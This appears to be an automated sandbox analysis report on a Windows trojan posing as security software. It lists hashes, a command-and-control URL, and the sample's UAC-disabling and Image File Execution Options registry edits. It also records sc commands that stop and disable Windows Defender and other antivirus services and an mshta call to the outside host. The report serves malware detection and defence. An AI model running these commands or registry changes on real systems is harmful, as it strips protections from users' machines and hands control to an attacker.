Analysis

Max time kernel: 150s
Max time network: 147s
Platform: windows7_x64
Resource: win7-20240220-en
Resource tags: arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
Submitted: 19/06/2024, 20:59
Static task: static1

Behavioral task: behavioral1
  Sample: 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
  Resource: win7-20240220-en

Behavioral task: behavioral2
  Sample: 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
  Resource: win10v2004-20240508-en
General

Target: 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
Size: 2.0MB
MD5: 0077c2fd7e98b372a973640ebdb67bb4
SHA1: 687f3783243b3da71d0cb882318224df3406a11c
SHA256: b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1
SHA512: 5866d2e329e5e7aff9e306af17c9cf7ddf7a4f47eb42f3473470af7ffb57af2c6473c1062f645369f050cb7852017f0d3dfbdabf84064c0508f77a6778d9e9aa
SSDEEP: 49152:DLqatPmogbmVZBTN1xC05KRkgc68WJI5NeGu5dkpFpERe8JjVwv14x4Q:DbmHb0f1CRNRJuIGu5mpFpERe8s1i
Malware Config
Extracted
http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1
Signatures

UAC bypass 3 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Protector-oxby.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | Protector-oxby.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-oxby.exe

Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luinit.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPck.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inetlnfo.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscman.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trickler.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hbsrv.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsTray.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atro55en.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atwatch.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp32.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixcfg.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setloadorder.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sweepnet.sweepsrv.sys.swnetsup.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atcon.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cv.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PskSvc.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashrep.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncinst4.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupvameeval.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiaudit.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfplogvw.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanpc.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wnt.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msbb.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwatch.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blss.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bpc.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\divx.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lordpe.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAcat.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\poproxy.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexplorerv1.0.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgiproxy.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkwctl9.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccevtmgr.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updat.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wrctrl.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnt.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaview.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rcsync.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\soap.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loader.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbscan.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto-protect.nav80try.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dpfsetup.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gbn976rl.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows.exe | Protector-oxby.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nupgrade.exe\Debugger = "svchost.exe" | Protector-oxby.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaui.exe | Protector-oxby.exe
Executes dropped EXE 3 IoCs
pid | Process
1996 | 6884gab1kb8k3p1.exe
2660 | l089d0966e530b3.exe
2620 | Protector-oxby.exe
Loads dropped DLL 7 IoCs
pid | Process
840 | 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
1996 | 6884gab1kb8k3p1.exe
1996 | 6884gab1kb8k3p1.exe
2660 | l089d0966e530b3.exe
2660 | l089d0966e530b3.exe
2620 | Protector-oxby.exe
2620 | Protector-oxby.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-oxby.exe" | Protector-oxby.exe

Checks whether UAC is enabled 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-oxby.exe
Drops file in System32 directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\services.msc | Protector-oxby.exe
File opened for modification | C:\Windows\SysWOW64\eventvwr.msc | Protector-oxby.exe
File opened for modification | C:\Windows\SysWOW64\diskmgmt.msc | Protector-oxby.exe
Launches sc.exe 8 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1540 | sc.exe
1664 | sc.exe
1672 | sc.exe
1904 | sc.exe
1940 | sc.exe
2308 | sc.exe
1908 | sc.exe
352 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies Internet Explorer settings 3 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 | Protector-oxby.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" | Protector-oxby.exe

Modifies system certificate store 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | Protector-oxby.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [binary blob omitted] | Protector-oxby.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2620 | Protector-oxby.exe (64 occurrences)
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2660 | l089d0966e530b3.exe
Token: SeShutdownPrivilege | 2660 | l089d0966e530b3.exe
Token: SeDebugPrivilege | 2620 | Protector-oxby.exe
Token: SeShutdownPrivilege | 2620 | Protector-oxby.exe
Suspicious use of FindShellTrayWindow 4 IoCs
pid | Process
2620 | Protector-oxby.exe (4 occurrences)
Suspicious use of SendNotifyMessage 4 IoCs
pid | Process
2620 | Protector-oxby.exe (4 occurrences)
Suspicious use of SetWindowsHookEx 6 IoCs
pid | Process
2660 | l089d0966e530b3.exe
2620 | Protector-oxby.exe (5 occurrences)
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 840 wrote to memory of 1996 | 840 | 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe | 28 (7 occurrences)
PID 1996 wrote to memory of 2660 | 1996 | 6884gab1kb8k3p1.exe | 29 (7 occurrences)
PID 2660 wrote to memory of 2620 | 2660 | l089d0966e530b3.exe | 30 (7 occurrences)
PID 2660 wrote to memory of 2392 | 2660 | l089d0966e530b3.exe | 31 (7 occurrences)
PID 2620 wrote to memory of 2524 | 2620 | Protector-oxby.exe | 33 (7 occurrences)
PID 2620 wrote to memory of 1904 | 2620 | Protector-oxby.exe | 36 (7 occurrences)
PID 2620 wrote to memory of 1940 | 2620 | Protector-oxby.exe | 37 (7 occurrences)
PID 2620 wrote to memory of 1908 | 2620 | Protector-oxby.exe | 38 (7 occurrences)
PID 2620 wrote to memory of 2308 | 2620 | Protector-oxby.exe | 41 (7 occurrences)
PID 2620 wrote to memory of 352 | 2620 | Protector-oxby.exe | 42
System policy modification 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Protector-oxby.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-oxby.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Protector-oxby.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | Protector-oxby.exe
Processes
(indented entries are child processes of the entry above them)

C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe (PID 840)
Command line: "C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe"
- Loads dropped DLL
- Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe (PID 1996)
  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe" -e -p7lf02436t7m3i73
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe (PID 2660)
    Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\Protector-oxby.exe (PID 2620)
      Command line: C:\Users\Admin\AppData\Roaming\Protector-oxby.exe
      - UAC bypass
      - Event Triggered Execution: Image File Execution Options Injection
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Checks whether UAC is enabled
      - Drops file in System32 directory
      - Modifies Internet Explorer settings
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      - System policy modification

        C:\Windows\SysWOW64\mshta.exe (PID 2524)
        Command line: mshta.exe "http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1"
        - Modifies Internet Explorer settings

        C:\Windows\SysWOW64\sc.exe (PID 1904)
        Command line: sc stop WinDefend
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 1940)
        Command line: sc config WinDefend start= disabled
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 1908)
        Command line: sc stop msmpsvc
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 2308)
        Command line: sc config msmpsvc start= disabled
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 352)
        Command line: sc config ekrn start= disabled
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 1540)
        Command line: sc stop AntiVirService
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 1672)
        Command line: sc config AntiVirService start= disabled
        - Launches sc.exe

        C:\Windows\SysWOW64\sc.exe (PID 1664)
        Command line: sc config AntiVirSchedulerService start= disabled
        - Launches sc.exe

      C:\Windows\SysWOW64\cmd.exe (PID 2392)
      Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\L089D0~1.EXE" >> NUL
Network
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Image File Execution Options Injection (1)

Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Image File Execution Options Injection (1)
Downloads

Filesize: 2.0MB
MD5: 1a45a0c072a3a8dbd8a3b8d92894e3f8
SHA1: 1e6db89437e0fd3bcb14c6c9dbe1ce98bb286c20
SHA256: 43bb6c5aac2f0a5b2597b274c69a0fac1d5d5bd6f62fed8a7b6a203cea3d3325
SHA512: 689531c4c6091f2124dd4a1750fd4b04fe282d2a61cd51ea5dc936609939f27a3025b0613384bc792c9bd57f64824535fc96ab9eca2e0dd19fb07be13dd16d42

Filesize: 1.9MB
MD5: b5ff5ef86e7f83fe0ea09efa4b2a13a5
SHA1: af3ad93fb39011d8f659fa6f4947664063319f59
SHA256: 94ef4a33bf5a8f36f70612b010eebc80ef605a4ddc4526d8dd1554c5f3030019
SHA512: 6dfd92e8a86fe13b0850d02551a98ee2a120087180a9263966f7e14b8a54ffa147cbe90da3fb54848a718ad8ca4b3e98dcf1c60eb8d484fdbc62390c95fef9cc